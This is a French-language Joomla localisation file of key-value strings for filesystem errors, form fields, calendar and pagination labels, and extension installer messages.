JLIB_FILESYSTEM_GZIP_UNABLE_TO_READ="Impossible de lire l'archive (gz)"
JLIB_FILESYSTEM_GZIP_UNABLE_TO_WRITE="Impossible d'écrire l'archive (gz)"
JLIB_FILESYSTEM_GZIP_UNABLE_TO_WRITE_FILE="Impossible d'écrire le fichier (gz)"
JLIB_FILESYSTEM_GZIP_UNABLE_TO_DECOMPRESS="Impossible de décompresser les données"
JLIB_FILESYSTEM_TAR_UNABLE_TO_READ="Impossible de lire l'archive (tar)"
JLIB_FILESYSTEM_TAR_UNABLE_TO_DECOMPRESS="Impossible de décompresser les données"
JLIB_FILESYSTEM_TAR_UNABLE_TO_CREATE_DESTINATION="Impossible de créer la destination"
JLIB_FILESYSTEM_TAR_UNABLE_TO_WRITE_ENTRY="Impossible d'écrire l'entrée"
JLIB_FILESYSTEM_ZIP_NOT_SUPPORTED="Zlib non supporté"
JLIB_FILESYSTEM_ZIP_UNABLE_TO_READ="Impossible de lire l'archive (zip)"
JLIB_FILESYSTEM_ZIP_INFO_FAILED="Échec de l'obtention de l'information ZIP"
JLIB_FILESYSTEM_ZIP_UNABLE_TO_CREATE_DESTINATION="Impossible de créer la destination"
JLIB_FILESYSTEM_ZIP_UNABLE_TO_WRITE_ENTRY="Impossible d'écrire l'entrée"
JLIB_FILESYSTEM_ZIP_UNABLE_TO_READ_ENTRY="Impossible de lire l'entrée"
JLIB_FILESYSTEM_ZIP_UNABLE_TO_OPEN_ARCHIVE="Impossible d'ouvrir l'archive"
JLIB_FILESYSTEM_ZIP_INVALID_ZIP_DATA="Données ZIP invalides"
JLIB_FILESYSTEM_STREAM_FAILED="Échec de l'enregistrement du flux de chaînes"
JLIB_FILESYSTEM_UNKNOWNARCHIVETYPE="Type d'archive inconnu"
JLIB_FILESYSTEM_UNABLE_TO_LOAD_ARCHIVE="Impossible de charger l'archive"
JLIB_FILESYSTEM_ERROR_JFILE_FIND_COPY="JFile::copy : impossible de trouver ou de lire le fichier %s"
JLIB_FILESYSTEM_ERROR_JFILE_STREAMS="JFile::copy(%1$s, %2$s) : %3$s"
JLIB_FILESYSTEM_ERROR_COPY_FAILED="Échec de la copie"
JLIB_FILESYSTEM_ERROR_COPY_FAILED_ERR01="Erreur de copie&nbsp;: %1$s vers %2$s"
JLIB_FILESYSTEM_DELETE_FAILED="Échec de la suppression de %s"
JLIB_FILESYSTEM_CANNOT_FIND_SOURCE_FILE="Impossible de trouver le fichier source"
JLIB_FILESYSTEM_ERROR_JFILE_MOVE_STREAMS="JFile::move : %s"
JLIB_FILESYSTEM_ERROR_RENAME_FILE="Échec du renommage"
JLIB_FILESYSTEM_ERROR_READ_UNABLE_TO_OPEN_FILE="JFile::read : impossible d'ouvrir le fichier %s"
JLIB_FILESYSTEM_ERROR_WRITE_STREAMS="JFile::write(%1$s): %2$s"
JLIB_FILESYSTEM_ERROR_UPLOAD="JFile::upload : %s"
JLIB_FILESYSTEM_ERROR_WARNFS_ERR01="Attention : impossible de modifier les permissions du fichier."
JLIB_FILESYSTEM_ERROR_WARNFS_ERR02="Attention : impossible de déplacer le fichier."
JLIB_FILESYSTEM_ERROR_WARNFS_ERR03="Attention : Le fichier %s n'a pas été envoyé sur le serveur pour raison de sécurité!"
JLIB_FILESYSTEM_ERROR_WARNFS_ERR04="Attention: Impossible de déplacer le fichier&nbsp;: %1$s vers %2$s"
JLIB_FILESYSTEM_ERROR_FIND_SOURCE_FOLDER="Impossible de trouver le répertoire source"
JLIB_FILESYSTEM_ERROR_FOLDER_EXISTS="Le répertoire existe déjà"
JLIB_FILESYSTEM_ERROR_FOLDER_CREATE="Impossible de créer le répertoire cible"
JLIB_FILESYSTEM_ERROR_FOLDER_OPEN="Impossible d'ouvrir le répertoire source"
JLIB_FILESYSTEM_ERROR_FOLDER_LOOP="Boucle infinie détectée"
JLIB_FILESYSTEM_ERROR_FOLDER_PATH="Le chemin n'est pas dans les chemins open_basedir"
JLIB_FILESYSTEM_ERROR_COULD_NOT_CREATE_DIRECTORY="Impossible de créer le répertoire"
JLIB_FILESYSTEM_ERROR_DELETE_BASE_DIRECTORY="Vous ne pouvez pas supprimer un répertoire de base."
JLIB_FILESYSTEM_ERROR_PATH_IS_NOT_A_FOLDER="JFolder::delete : le chemin n'est pas un répertoire. Chemin&#160;: %s"
JLIB_FILESYSTEM_ERROR_FOLDER_DELETE="JFolder::delete : impossible de supprimer le répertoire. Chemin&#160;: %s"
JLIB_FILESYSTEM_ERROR_FOLDER_RENAME="Échec du renommage&#160;: %s"
JLIB_FILESYSTEM_ERROR_PATH_IS_NOT_A_FOLDER_FILES="JFolder::files : le chemin n'est pas un répertoire. Chemin&#160;: %s"
JLIB_FILESYSTEM_ERROR_PATH_IS_NOT_A_FOLDER_FOLDER="JFolder::folder : le chemin n'est pas un répertoire. Chemin&#160;: %s"
JLIB_FILESYSTEM_ERROR_STREAMS_FILE_SIZE="Impossible d'obtenir la taille du fichier. Cela peut ne pas fonctionner pour tous les flux."
JLIB_FILESYSTEM_ERROR_STREAMS_FILE_NOT_OPEN="Fichier non ouvert"
JLIB_FILESYSTEM_ERROR_STREAMS_FILENAME="Nom de fichier non réglé"
JLIB_FILESYSTEM_ERROR_NO_DATA_WRITTEN="Attention&#160;: aucune donnée écrite."
JLIB_FILESYSTEM_ERROR_STREAMS_FAILED_TO_OPEN_WRITER="Impossible d'ouvrir en écriture %s"
JLIB_FILESYSTEM_ERROR_STREAMS_FAILED_TO_OPEN_READER="Impossible d'ouvrir en lecture %s"
JLIB_FILESYSTEM_ERROR_STREAMS_NOT_UPLOADED_FILE="Pas un fichier transféré !"

JLIB_FILTER_PARAMS_ALNUM="Alpha numérique"
JLIB_FILTER_PARAMS_FLOAT="Float"
JLIB_FILTER_PARAMS_INTEGER="Nombre entier"
JLIB_FILTER_PARAMS_RAW="Brut"
JLIB_FILTER_PARAMS_SAFEHTML="Safe HTML"
JLIB_FILTER_PARAMS_TEL="Téléphone"
JLIB_FILTER_PARAMS_TEXT="Texte"

JLIB_FORM_BUTTON_CLEAR="Effacer"
JLIB_FORM_BUTTON_SELECT="Sélectionner"
JLIB_FORM_CHANGE_IMAGE="Changer d'image"
JLIB_FORM_CHANGE_IMAGE_BUTTON="Changer l'image du bouton"
JLIB_FORM_CHANGE_USER="Sélectionner un utilisateur"
JLIB_FORM_ERROR_FIELDS_CATEGORY_ERROR_EXTENSION_EMPTY="L'attribut de l'extension est vide dans le champ catégorie"
JLIB_FORM_ERROR_FIELDS_GROUPEDLIST_ELEMENT_NAME="Type d'élément inconnu&#160;: %s"
JLIB_FORM_ERROR_NO_DATA="Aucune donnée"
JLIB_FORM_ERROR_VALIDATE_FIELD="Champ xml invalide"
JLIB_FORM_ERROR_XML_FILE_DID_NOT_LOAD="Le fichier XML n'a pas été chargé"
JLIB_FORM_FIELD_INVALID="Champ invalide&#160;:&#160;"
JLIB_FORM_INPUTMODE="latin"
JLIB_FORM_INVALID_FORM_OBJECT="Objet de formulaire invalide: %s"
JLIB_FORM_INVALID_FORM_RULE="Règle de formulaire invalide: %s"
JLIB_FORM_MEDIA_PREVIEW_ALT="Image sélectionnée"
JLIB_FORM_MEDIA_PREVIEW_EMPTY="Aucune image sélectionnée."
JLIB_FORM_MEDIA_PREVIEW_SELECTED_IMAGE="Image sélectionnée"
JLIB_FORM_MEDIA_PREVIEW_TIP_TITLE="Prévisualisation"
JLIB_FORM_SELECT_USER="Sélectionnez un utilisateur"
JLIB_FORM_VALIDATE_FIELD_INVALID="Champ invalide: %s"
JLIB_FORM_VALIDATE_FIELD_REQUIRED="Champ requis: %s"
JLIB_FORM_VALIDATE_FIELD_RULE_MISSING="Règle de validation manquante: %s"
JLIB_FORM_VALIDATE_FIELD_URL_SCHEMA_MISSING="URL invalide : schéma d'URL manquant dans %1$s. Ajouter l'un des schémas suivants au début : %2$s."
JLIB_FORM_VALUE_CACHE_APC="Cache PHP alternatif"
JLIB_FORM_VALUE_CACHE_APCU="Cache utilisateur APC"
JLIB_FORM_VALUE_CACHE_CACHELITE="Cache_Lite"
JLIB_FORM_VALUE_CACHE_EACCELERATOR="eAccelerator"
JLIB_FORM_VALUE_CACHE_FILE="Fichier"
JLIB_FORM_VALUE_CACHE_MEMCACHE="Mémoire cache"
JLIB_FORM_VALUE_CACHE_MEMCACHED="Mis en mémoire cache (expérimental)"
JLIB_FORM_VALUE_CACHE_REDIS="Redis"
JLIB_FORM_VALUE_CACHE_WINCACHE="Cache de Windows"
JLIB_FORM_VALUE_CACHE_XCACHE="XCache"
JLIB_FORM_VALUE_SESSION_APC="Cache PHP alternatif"
JLIB_FORM_VALUE_SESSION_APCU="Cache utilisateur APC"
JLIB_FORM_VALUE_SESSION_DATABASE="Base de données"
JLIB_FORM_VALUE_SESSION_EACCELERATOR="eAccelerator"
JLIB_FORM_VALUE_SESSION_MEMCACHE="Mémoire cache"
JLIB_FORM_VALUE_SESSION_MEMCACHED="Mis en mémoire cache (expérimental)"
JLIB_FORM_VALUE_SESSION_NONE="PHP"
JLIB_FORM_VALUE_SESSION_REDIS="Redis"
JLIB_FORM_VALUE_SESSION_WINCACHE="Cache Windows"
JLIB_FORM_VALUE_SESSION_XCACHE="XCache"
JLIB_FORM_VALUE_TIMEZONE_UTC="Temps universel, coordonné (UTC)"
JLIB_FORM_VALUE_FROM_TEMPLATE="Du template"
JLIB_FORM_VALUE_INHERITED="Hérité"

JLIB_HTML_ACCESS_MODIFY_DESC_CAPTION_ACL="ACL"
JLIB_HTML_ACCESS_MODIFY_DESC_CAPTION_TABLE="Table"
JLIB_HTML_ACCESS_SUMMARY_DESC_CAPTION="Table du sommaire ACL"
JLIB_HTML_ACCESS_SUMMARY_DESC="Est affichée ci-dessous une vue d'ensemble du réglage des accès pour cet article. Cliquez sur les onglets ci-dessus pour personnaliser ces réglages par action."
JLIB_HTML_ACCESS_SUMMARY="Synthèse"
JLIB_HTML_ADD_TO_ROOT="Ajouter à la racine"
JLIB_HTML_ADD_TO_THIS_MENU="Ajouter à ce menu"
JLIB_HTML_BATCH_ACCESS_LABEL="Sélectionner le niveau d'accès"
JLIB_HTML_BATCH_ACCESS_LABEL_DESC="Si vous n'effectuez aucune sélection, les niveaux d'accès d'origine seront appliqués."
JLIB_HTML_BATCH_COPY="Copier"
JLIB_HTML_BATCH_FLIPORDERING_LABEL="Inverser l’ordre de tous les articles dans les catégories sélectionnées "
JLIB_HTML_BATCH_LANGUAGE_LABEL="Choisir une langue"
JLIB_HTML_BATCH_LANGUAGE_LABEL_DESC="Si aucun choix n'est effectué, la langue d'origine sera appliquée lors du traitement."
JLIB_HTML_BATCH_LANGUAGE_NOCHANGE="- Garder la langue d'origine -"
JLIB_HTML_BATCH_MENU_LABEL="Pour déplacer ou copier la sélection, choisir une catégorie"
JLIB_HTML_BATCH_MOVE="Déplacer"
JLIB_HTML_BATCH_MOVE_QUESTION="Voulez-vous déplacer les éléments ou en faire une copie ?"
JLIB_HTML_BATCH_NO_CATEGORY="- Ne pas déplacer ou copier -"
JLIB_HTML_BATCH_NOCHANGE="- Conserver les niveaux d'origine -"
JLIB_HTML_BATCH_TAG_LABEL="Ajouter un tag"
JLIB_HTML_BATCH_TAG_LABEL_DESC="Ajouter un tag à l'élément sélectionné."
JLIB_HTML_BATCH_TAG_NOCHANGE="- Conserver les tags originaux -"
JLIB_HTML_BATCH_USER_LABEL="Réglez l'utilisateur"
JLIB_HTML_BATCH_USER_LABEL_DESC="Ne pas effectuer de sélection conserve l'utilisateur original lors du processus."
JLIB_HTML_BATCH_USER_NOCHANGE="- Conserveur l'utilisateur -"
JLIB_HTML_BATCH_USER_NOUSER="Aucun utilisateur"
JLIB_HTML_BEHAVIOR_ABOUT_THE_CALENDAR="À propos du calendrier"
JLIB_HTML_BEHAVIOR_CLOSE="Fermer"
JLIB_HTML_BEHAVIOR_DATE_SELECTION="Sélection de la date&#160;:"
JLIB_HTML_BEHAVIOR_DISPLAY_S_FIRST="Afficher %s d'abord"
JLIB_HTML_BEHAVIOR_DRAG_TO_MOVE="Tirer pour déplacer"
JLIB_HTML_BEHAVIOR_GO_TODAY="Aller à aujourd'hui"
JLIB_HTML_BEHAVIOR_GREEN="Vert"
JLIB_HTML_BEHAVIOR_HOLD_MOUSE="- Maintenez enfoncé le bouton de la souris sur l'un des boutons ci-dessus pour une sélection plus rapide."
JLIB_HTML_BEHAVIOR_MONTH_SELECT="- Utilisez les boutons < et > pour sélectionner le mois"
JLIB_HTML_BEHAVIOR_NEXT_MONTH_HOLD_FOR_MENU="Cliquez pour passer au mois suivant. Maintenez cliqué pour une liste de mois."
JLIB_HTML_BEHAVIOR_NEXT_YEAR_HOLD_FOR_MENU="Cliquez pour passer à l'année suivante. Maintenez cliqué pour une liste d'années."
JLIB_HTML_BEHAVIOR_OPEN_CALENDAR="Ouvrir le calendrier"
JLIB_HTML_BEHAVIOR_PREV_MONTH_HOLD_FOR_MENU="Cliquez pour passer au mois précédent. Maintenez cliqué pour une liste de mois."
JLIB_HTML_BEHAVIOR_PREV_YEAR_HOLD_FOR_MENU="Cliquez pour passer à l'année précédente. Maintenez cliqué pour une liste d'années."
JLIB_HTML_BEHAVIOR_SELECT_DATE="Sélectionnez une date."
JLIB_HTML_BEHAVIOR_SHIFT_CLICK_OR_DRAG_TO_CHANGE_VALUE="(Maj-)Clic ou tirez pour modifier la valeur."
JLIB_HTML_BEHAVIOR_TIME="Heure :"
JLIB_HTML_BEHAVIOR_TODAY="Aujourd'hui"
JLIB_HTML_BEHAVIOR_TT_DATE_FORMAT="%a, %b %e"
JLIB_HTML_BEHAVIOR_WK="sem."
JLIB_HTML_BEHAVIOR_YEAR_SELECT="- Utilisez les boutons « et » pour sélectionner l'année"
JLIB_HTML_BUTTON_BASE_CLASS="Impossible de charger la classe de base du bouton."
JLIB_HTML_BUTTON_NO_LOAD="Impossible de charger le bouton %s (%s);"
JLIB_HTML_BUTTON_NOT_DEFINED="Bouton non défini pour le type = %s"
JLIB_HTML_CALENDAR="Calendrier"
JLIB_HTML_CHECKED_OUT="Verrouillé"
JLIB_HTML_CHECKIN="Déverrouiller"
JLIB_HTML_CLOAKING="Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser."
JLIB_HTML_DATE_RELATIVE_DAYS="Il y a %s jours"
JLIB_HTML_DATE_RELATIVE_DAYS_1="Il y a %s jour"
JLIB_HTML_DATE_RELATIVE_DAYS_0="Il y a %s jours"
JLIB_HTML_DATE_RELATIVE_HOURS="Il y a %s heures"
JLIB_HTML_DATE_RELATIVE_HOURS_1="Il y a %s heure"
JLIB_HTML_DATE_RELATIVE_HOURS_0="Il y a %s heures"
JLIB_HTML_DATE_RELATIVE_LESSTHANAMINUTE="Il y a moins d'une minute"
JLIB_HTML_DATE_RELATIVE_MINUTES="Il y a %s minutes"
JLIB_HTML_DATE_RELATIVE_MINUTES_1="Il y a %s minute"
JLIB_HTML_DATE_RELATIVE_MINUTES_0="Il y a %s minutes"
JLIB_HTML_DATE_RELATIVE_WEEKS="Il y a %s semaines"
JLIB_HTML_DATE_RELATIVE_WEEKS_1="Il y a %s semaine"
JLIB_HTML_DATE_RELATIVE_WEEKS_0="Il y a %s semaines"
JLIB_HTML_EDIT_MENU_ITEM="Modifier le lien de menu"
JLIB_HTML_EDIT_MENU_ITEM_ID="Id du lien de menu : %s"
JLIB_HTML_EDIT_MODULE="Modifier le module"
JLIB_HTML_EDIT_MODULE_IN_POSITION="Position: %s"
JLIB_HTML_EDITOR_CANNOT_LOAD="Impossible de charger l'éditeur de texte"
JLIB_HTML_END="Fin"
JLIB_HTML_ERROR_FUNCTION_NOT_SUPPORTED="Fonction non supportée."
JLIB_HTML_ERROR_NOTFOUNDINFILE="%s::%s introuvable dans le fichier."
JLIB_HTML_ERROR_NOTSUPPORTED_NOFILE="%s::%s non supporté. Fichier introuvable."
JLIB_HTML_ERROR_NOTSUPPORTED="%s::%s non supporté."
JLIB_HTML_GOTO_PAGE="Aller à la page %s"
JLIB_HTML_GOTO_POSITION="Aller à la page %s"
JLIB_HTML_MOVE_DOWN="Vers le bas"
JLIB_HTML_MOVE_UP="Vers le haut"
JLIB_HTML_NO_PARAMETERS_FOR_THIS_ITEM="Il n'y a aucun paramètre pour cet élément"
JLIB_HTML_NO_RECORDS_FOUND="Aucun enregistrement trouvé"
JLIB_HTML_PAGE_CURRENT="Page %s"
JLIB_HTML_PAGE_CURRENT_OF_TOTAL="Page %s sur %s"
JLIB_HTML_PAGINATION="Pagination"
JLIB_HTML_PLEASE_MAKE_A_SELECTION_FROM_THE_LIST="Veuillez d'abord effectuer une sélection dans la liste."
JLIB_HTML_PUBLISH_ITEM="Publier cet élément"
JLIB_HTML_PUBLISHED_EXPIRED_ITEM="Publié, mais a expiré"
JLIB_HTML_PUBLISHED_FINISHED="Fin&#160;: %s"
JLIB_HTML_PUBLISHED_ITEM="Publié et courant"
JLIB_HTML_PUBLISHED_PENDING_ITEM="Publié, mais en attente"
JLIB_HTML_PUBLISHED_START="Début&#160;: %s"
JLIB_HTML_RESULTS_OF="Résultats %s à %s sur %s"
JLIB_HTML_SAVE_ORDER="Enregistrer l'ordre"
JLIB_HTML_SELECT_STATE="Sélectionner le statut"
JLIB_HTML_START="Début"
JLIB_HTML_UNPUBLISH_ITEM="Dépublier lʼélément"
JLIB_HTML_VIEW_ALL="Afficher tout"
JLIB_HTML_SETDEFAULT_ITEM="Régler par défaut"
JLIB_HTML_UNSETDEFAULT_ITEM="Supprimer le réglage par défaut"

JLIB_INSTALLER_ABORT="Interruption de l'installation de la langue : %s"
JLIB_INSTALLER_ABORT_ALREADYINSTALLED="L'extension est déjà installée"
JLIB_INSTALLER_ABORT_ALREADY_EXISTS="Extension %1$s: Extension %2$s existe déjà"
JLIB_INSTALLER_ABORT_COMP_BUILDADMINMENUS_FAILED="Erreur de construction des menus de l'administration"
JLIB_INSTALLER_ABORT_COMP_COPY_MANIFEST="Composant %1$s&#160;: Impossible de copier le fichier manifeste PHP.."
JLIB_INSTALLER_ABORT_COMP_COPY_SETUP="Composant %1$s&#160;: Impossible de copier le fichier d'initialisation."
JLIB_INSTALLER_ABORT_COMP_FAIL_ADMIN_FILES="Composant %s&#160;: Impossible de copier les fichiers administration."
JLIB_INSTALLER_ABORT_COMP_FAIL_SITE_FILES="Component %s&#160;: Impossible de copier les fichiers site."
JLIB_INSTALLER_ABORT_COMP_INSTALL_COPY_SETUP="Installation d'un composant&#160;: impossible de copier le fichier d'initialisation."
JLIB_INSTALLER_ABORT_COMP_INSTALL_CUSTOM_INSTALL_FAILURE="Installation d'un composant&#160;: échec de la routine d'installation personnalisée"
JLIB_INSTALLER_ABORT_COMP_INSTALL_MANIFEST="Installation d'un composant&#160;: impossible de copier le fichier PHP manifest."
JLIB_INSTALLER_ABORT_COMP_INSTALL_PHP_INSTALL="Installation d'un composant&#160;: impossible de copier le fichier PHP d'installation."
JLIB_INSTALLER_ABORT_COMP_INSTALL_PHP_UNINSTALL="Installation d'un composant&#160;: impossible de copier le fichier PHP de désinstallation."
JLIB_INSTALLER_ABORT_COMP_INSTALL_ROLLBACK="Installation d'un composant&#160;: %s"
JLIB_INSTALLER_ABORT_COMP_INSTALL_SQL_ERROR="Installation d'un composant&#160;: erreur SQL du fichier %s"
JLIB_INSTALLER_ABORT_COMP_UPDATESITEMENUS_FAILED="Installation de composant : Impossible de mettre à jour des liens de menu"
JLIB_INSTALLER_ABORT_COMP_UPDATE_ADMIN_ELEMENT="Mise à jour d'un composant&#160;: le fichier XML ne contenait pas d'élément d'administration"
JLIB_INSTALLER_ABORT_COMP_UPDATE_COPY_SETUP="Mise à jour d'un composant&#160;: impossible de copier le fichier d'initialisation."
JLIB_INSTALLER_ABORT_COMP_UPDATE_MANIFEST="Mise à jour d'un composant&#160;: impossible de copier le fichier PHP manifest."
JLIB_INSTALLER_ABORT_COMP_UPDATE_PHP_INSTALL="Mise à jour d'un composant&#160;: impossible de copier le fichier PHP d'installation."
JLIB_INSTALLER_ABORT_COMP_UPDATE_PHP_UNINSTALL="Mise à jour d'un composant&#160;: impossible de copier le fichier PHP de désinstallation."
JLIB_INSTALLER_ABORT_COMP_UPDATE_ROLLBACK="Mise à jour d'un composant&#160;: %s"
JLIB_INSTALLER_ABORT_COMP_UPDATE_SQL_ERROR="Mise à jour d'un composant&#160;: erreur SQL du fichier %s"
JLIB_INSTALLER_ABORT_CREATE_DIRECTORY="Extension %1$s&#160;: Impossible de créer le répertoire : %2$s"
JLIB_INSTALLER_ABORT_DEBUG="Installation terminée de façon inattendue&#160;:"
JLIB_INSTALLER_ABORT_DETECTMANIFEST="Impossible de détecter le fichier manifest"
JLIB_INSTALLER_ABORT_DIRECTORY="Extension %1$s&#160;: Un autre %2$s utilise déjà le répertoire du nom de&#160;: %3$s. Tentez-vous d'installer à nouveau la même extension&#160;?"
JLIB_INSTALLER_ABORT_ERROR_DELETING_EXTENSIONS_RECORD="Impossible de supprimer l'enregistrement de l'extension de la base de données."
JLIB_INSTALLER_ABORT_EXTENSIONNOTVALID="L'extension n'est pas valide"
JLIB_INSTALLER_ABORT_FILE_INSTALL_COPY_SETUP="Installation de fichiers&#160;: impossible de copier le fichier d'initialisation."
JLIB_INSTALLER_ABORT_FILE_INSTALL_CUSTOM_INSTALL_FAILURE="Installation de fichiers&#160;: échec de la routine d'installation personnalisée"
JLIB_INSTALLER_ABORT_FILE_INSTALL_FAIL_SOURCE_DIRECTORY="Installation de fichiers&#160;: impossible de trouver le répertoire source %s"
JLIB_INSTALLER_ABORT_FILE_INSTALL_ROLLBACK="Installation de fichiers&#160;: %s"
JLIB_INSTALLER_ABORT_FILE_INSTALL_SQL_ERROR="Installation de fichiers&#160;: erreur SQL du fichier %s"
JLIB_INSTALLER_ABORT_FILE_ROLLBACK="Installation de fichiers&#160;: %s"
JLIB_INSTALLER_ABORT_FILE_SAME_NAME="Installation de fichiers&#160;: une autre extension avec le même nom existe déjà."
JLIB_INSTALLER_ABORT_FILE_UPDATE_SQL_ERROR="Mise à jour de fichiers&#160;: erreur SQL du fichier %s"
JLIB_INSTALLER_ABORT_INSTALL_CUSTOM_INSTALL_FAILURE="Extension %s: Échec de l'installation personnalisée"
JLIB_INSTALLER_ABORT_LIB_COPY_FILES="Librairie %s&#160;: impossible de copier les fichiers depuis la source"
JLIB_INSTALLER_ABORT_LIB_INSTALL_ALREADY_INSTALLED="Installation de librairie&#160;: la librairie est déjà installée"
JLIB_INSTALLER_ABORT_LIB_INSTALL_COPY_SETUP="Installation de librairie&#160;: impossible de copier le fichier d'initialisation."
JLIB_INSTALLER_ABORT_LIB_INSTALL_CORE_FOLDER="Installation de la bibliothèque: la bibliothèque a le même nom qu'un dossier du noyau."
JLIB_INSTALLER_ABORT_LIB_INSTALL_FAILED_TO_CREATE_DIRECTORY="Installation de librairie&#160;: échec de création du répertoire %s"
JLIB_INSTALLER_ABORT_LIB_INSTALL_NOFILE="Installation de librairie&#160;: aucun fichier de librairie spécifié"
JLIB_INSTALLER_ABORT_LIB_INSTALL_ROLLBACK="Installation de librairie&#160;: %s"
JLIB_INSTALLER_ABORT_LOAD_DETAILS="Échec du chargement des détails de l'extension"
JLIB_INSTALLER_ABORT_MANIFEST="Extension %1$s&#160;: Could not copy PHP manifest file."
JLIB_INSTALLER_ABORT_METHODNOTSUPPORTED="Méthode non supportée pour ce type d'extension"
JLIB_INSTALLER_ABORT_METHODNOTSUPPORTED_TYPE="Méthode non supportée pour ce type d'extension&#160;: %s"
JLIB_INSTALLER_ABORT_MOD_COPY_FILES="Module %s&#160;: Could not copy files from the source"
JLIB_INSTALLER_ABORT_MOD_INSTALL_COPY_SETUP="Installation d'un module&#160;: impossible de copier le fichier d'initialisation."
JLIB_INSTALLER_ABORT_MOD_INSTALL_CREATE_DIRECTORY="Module %1$s : échec de création du répertoire %2$s"
JLIB_INSTALLER_ABORT_MOD_INSTALL_CUSTOM_INSTALL_FAILURE="Installation d'un module&#160;: échec de la routine d'installation personnalisée"
JLIB_INSTALLER_ABORT_MOD_INSTALL_DIRECTORY="Module %1$s : un autre module utilise déjà le répertoire %2$s"
JLIB_INSTALLER_ABORT_MOD_INSTALL_MANIFEST="Installation d'un module&#160;: impossible de copier le fichier manifest PHP."
JLIB_INSTALLER_ABORT_MOD_INSTALL_NOFILE="Module %s : aucun fichier de module spécifié"
JLIB_INSTALLER_ABORT_MOD_INSTALL_SQL_ERROR="Module %1$s : erreur SQL du fichier %2$s"
JLIB_INSTALLER_ABORT_MOD_ROLLBACK="Module %1$s : %2$s"
JLIB_INSTALLER_ABORT_MOD_UNINSTALL_UNKNOWN_CLIENT="Désinstallation d'un module&#160;: type de client inconnu [%s]"
JLIB_INSTALLER_ABORT_MOD_UNKNOWN_CLIENT="Module %1$s : type de client inconnu [%2$s]"
JLIB_INSTALLER_ABORT_NOINSTALLPATH="Le chemin d'installation n'existe pas"
JLIB_INSTALLER_ABORT_NOUPDATEPATH="Le chemin de mise à jour n'existe pas"
JLIB_INSTALLER_ABORT_PACK_INSTALL_COPY_SETUP="Installation d'un paquet&#160;: impossible de copier le fichier d'initialisation."
JLIB_INSTALLER_ABORT_PACK_INSTALL_CREATE_DIRECTORY="Installation d'un paquet&#160;: échec de création du répertoire %s."
JLIB_INSTALLER_ABORT_PACKAGE_INSTALL_CUSTOM_INSTALL_FAILURE="Installation d'un paquet&#160;: Erreur de routine pour installation personnalisée."
JLIB_INSTALLER_ABORT_PACKAGE_INSTALL_MANIFEST="Installation échouée&#160;: impossible de copier le fichier manifest PHP."
JLIB_INSTALLER_ABORT_PACK_INSTALL_ERROR_EXTENSION="Installation d'un paquet&#160;: il y a eu une erreur en installant l'extension %s"
JLIB_INSTALLER_ABORT_PACK_INSTALL_NO_FILES="Installation d'un paquet&#160;: il n'y avait aucun fichier à installer. %s"
JLIB_INSTALLER_ABORT_PACK_INSTALL_NO_PACK="Installation d'un paquet&#160;: aucun fichier paquet spécifié"
JLIB_INSTALLER_ABORT_PACK_INSTALL_ROLLBACK="Installation d'un paquet&#160;: %s"
JLIB_INSTALLER_ABORT_PLG_COPY_FILES="Plug-in %s&#160;: impossible de copier les fichiers depuis la source"
JLIB_INSTALLER_ABORT_PLG_INSTALL_ALLREADY_EXISTS="Plug-in %1$s : le plug-in %2$s existe déjà"
JLIB_INSTALLER_ABORT_PLG_INSTALL_COPY_SETUP="Plug-in %s : impossible de copier le fichier d'initialisation."
JLIB_INSTALLER_ABORT_PLG_INSTALL_CREATE_DIRECTORY="Plug-in %1$s : échec de la création du répertoire %2$s"
JLIB_INSTALLER_ABORT_PLG_INSTALL_CUSTOM_INSTALL_FAILURE="Installation d'un plug-in&#160;: échec de la routine d'installation personnalisée."
JLIB_INSTALLER_ABORT_PLG_INSTALL_DIRECTORY="Plug-in %1$s : un autre plug-in utilise déjà le répertoire %2$s"
JLIB_INSTALLER_ABORT_PLG_INSTALL_MANIFEST="Plug-in %s : impossible de copier le fichier manifest PHP."
JLIB_INSTALLER_ABORT_PLG_INSTALL_NO_FILE="Plug-in %s : aucun fichier plug-in spécifié"
JLIB_INSTALLER_ABORT_PLG_INSTALL_ROLLBACK="Plug-in %1$s : %2$s"
JLIB_INSTALLER_ABORT_PLG_INSTALL_SQL_ERROR="Plug-in %1$s : erreur SQL du fichier %2$s"
JLIB_INSTALLER_ABORT_PLG_UNINSTALL_SQL_ERROR="Désinstallation d'un plug-in&#160;: erreur SQL du fichier %s"
JLIB_INSTALLER_ABORT_REFRESH_MANIFEST_CACHE="Échec de l'actualisation du cache du fichier manifest&#160;: l'extension %s n'est pas installée actuellement."
JLIB_INSTALLER_ABORT_REFRESH_MANIFEST_CACHE_VALID="Échec de l'actualisation du cache du fichier manifest&#160;: l'extension n'est pas valide."
JLIB_INSTALLER_ABORT_ROLLBACK="Extension %1$s&#160;: %2$s"
JLIB_INSTALLER_ABORT_SQL_ERROR="Extension %1$s&#160;: Erreur SQL de traitement de la requête&#160;: %2$s"
JLIB_INSTALLER_ABORT_TPL_INSTALL_ALREADY_INSTALLED="Installation d'un gabarit&#160;: gabarit déjà installé"
JLIB_INSTALLER_ABORT_TPL_INSTALL_ANOTHER_TEMPLATE_USING_DIRECTORY="Installation d'un gabarit&#160;: il y a déjà un gabarit qui utilise le répertoire nommé %s. Essayez-vous d'installer à nouveau le même gabarit ?"
JLIB_INSTALLER_ABORT_TPL_INSTALL_COPY_FILES="Template Install&#160;: impossible de copier les fichiers depuis la source"
JLIB_INSTALLER_ABORT_TPL_INSTALL_COPY_SETUP="Installation d'un gabarit&#160;: impossible de copier le fichier d'initialisation."
JLIB_INSTALLER_ABORT_TPL_INSTALL_FAILED_CREATE_DIRECTORY="Installation d'un gabarit&#160;: échec de la création du répertoire %s"
JLIB_INSTALLER_ABORT_TPL_INSTALL_ROLLBACK="Installation d'un gabarit&#160;: %s"
JLIB_INSTALLER_ABORT_TPL_INSTALL_UNKNOWN_CLIENT="Installation d'un gabarit&#160;: type de client inconnu [%s]"
JLIB_INSTALLER_AVAILABLE_UPDATE_PHP_VERSION="La version %2$s est disponible pour l'extension %1$s, mais elle nécessite au moins la version de PHP %3$s alors que votre système n'utilise que la version %4$s"
JLIB_INSTALLER_AVAILABLE_UPDATE_DB_MINIMUM="La version %2$s de l'extension %1$s est disponible, mais la version %4$s de votre base de donnés %3$s n'est pas compatible. Merci de contacter votre hébergeur pour mettre à jour la version de votre base de donnés en au moins %5$s."
JLIB_INSTALLER_AVAILABLE_UPDATE_DB_TYPE="La version %2$s de l'extension %1$s est disponible, mais votre base de données %3$s n'est plus compatible.."
JLIB_INSTALLER_PURGED_UPDATES="Mises à jour effacées"
